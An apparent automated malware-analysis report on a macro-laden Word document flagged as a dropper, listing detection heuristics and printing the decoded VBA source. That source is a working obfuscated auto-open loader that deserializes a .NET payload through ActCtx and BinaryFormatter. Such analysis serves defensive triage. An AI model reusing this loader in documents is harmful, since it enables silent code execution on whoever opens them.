Verdict: MALICIOUS
Risk score: 300
Heuristics: 9
- ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 [critical, CLAMAV_DETECTION]. ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1.
- VBA project inside OOXML [medium, OOXML_VBA, 5 related findings]. Document contains a VBA project — VBA macros present.
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]. Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: Set DM1 = CreateObject(comida("MODLMX.tfosorciM"))
- CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched line in script: Set DM1 = CreateObject(comida("MODLMX.tfosorciM"))
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]. Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script: Sub AutoOpen()
- Document_Open macro [low, OLE_VBA_DOCOPEN]. Matched line in script: Sub Document_Open()
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]. One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every extracted URL in this sample carried the label: In document text (OOXML body / shared strings).
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16894 bytes |

SHA-256: 169e5a82b167941d67bd3b6057a1e2d88c2737e5c2c64d5f2aa1a1cc53d9ab25
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 43 long base64-like blobs).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function comida(c)
comida = StrReverse(c)
End Function
Sub DebugPrint(s)
End Sub
Private Function dh(hex)
On Error Resume Next
Dim DM1, EL1
Set DM1 = CreateObject(comida("MODLMX.tfosorciM"))
Set EL1 = DM1.createElement(comida("pmt"))
EL1.DataType = comida("xeh.nib")
EL1.Text = hex
dh = EL1.NodeTypedValue
End Function
Function rn()
On Error Resume Next
If ActiveDocument.Name <> comida("mcod.tseT") Then
Exit Function
End If
Dim s As String
ec = "TestClass"
Dim stm As Object, fmt As Object, al As Object
Set stm = CreateObject(comida("maertSyromeM.OI.metsyS"))
If stm Is Nothing Then
manifest = comida("reS.emitnuR.metsyS=digorp }7D4C9AA9D5A2-11BB-A873-5F39-FA7ABC0D{=dislc ssalCrlc<>/ 980E439165C5A77B=nekoTyeKcilbup 0.0.0.4=noisrev bilrocsm=eman ytitnedIylbmessa<>0.1=noisreVtsefinam 1v.msa:moc-tfosorcim-samehcs:nru=snlmx ylbmessa<>?sey=enoladnats 61-FTU=gnidocne 0.1=noisrev lmx?<")
manifest = manifest & comida("oC.metsyS=eman htoB=ledoMgnidaerht tsiLyarrA.snoitcelloC.metsyS=digorp }74386418F9CB-13DB-7A93-E554-647709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur rettamroFyraniB.yraniB.srettamroF.noitazilaireS.emitnuR.metsyS=eman htoB=ledoMgnidaerht rettamroFyraniB.yraniB.srettamroF.noitazilai")
manifest = manifest & comida(".metsyS=digorp }74388418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur gnidocnEIICSA.txeT.metsyS=eman htoB=ledoMgnidaerht gnidocnEIICSA.txeT.metsyS=digorp }74386418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur tsiLyarrA.snoitcell")
manifest = manifest & comida("Vemitnur maertSyromeM.OI.metsyS=eman htoB=ledoMgnidaerht maertSyromeM.OI.metsyS=digorp }74B86418F9CB-13DB-7A93-E554-648709D8{=dislc ssalCrlc<>/ 91303.0.4v=noisreVemitnur mrofsnarT46esaBmorF.yhpargotpyrC.ytiruceS.metsyS=eman htoB=ledoMgnidaerht mrofsnarT46esaBmorF.yhpargotpyrC.ytiruceS")
manifest = manifest & "ersion=""v4.0.30319"" /></assembly>"
Set ax = CreateObject("Microsoft.Windows.ActCtx")
ax.ManifestText = manifest
Set stm = ax.CreateObject(comida("maertSyromeM.OI.metsyS"))
Set fmt = ax.CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = ax.CreateObject("System.Collections.ArrayList")
Else
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
End If
Dim dec
dec = dh(s)
For Each i In dec
stm.WriteByte i
Next i
stm.Position = 0
Dim n As Object, d As Object, o As Object
Set d = fmt.Deserialize_2(stm)
al.Add Empty
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(ec)
If Err.Number <> 0 Then
DebugPrint Err.Description
Err.Clear
End If
End Function
Sub AutoOpen()
rn
End Sub
Sub Document_Open()
rn
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 69632 bytes |

SHA-256: c056f6ff43130e6cf2f4a15620888314447ed37b31640eb055fe7e81e49f4007
Detection: ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1. Obfuscation or payload: likely (carved artifact contains 44 long base64-like blobs).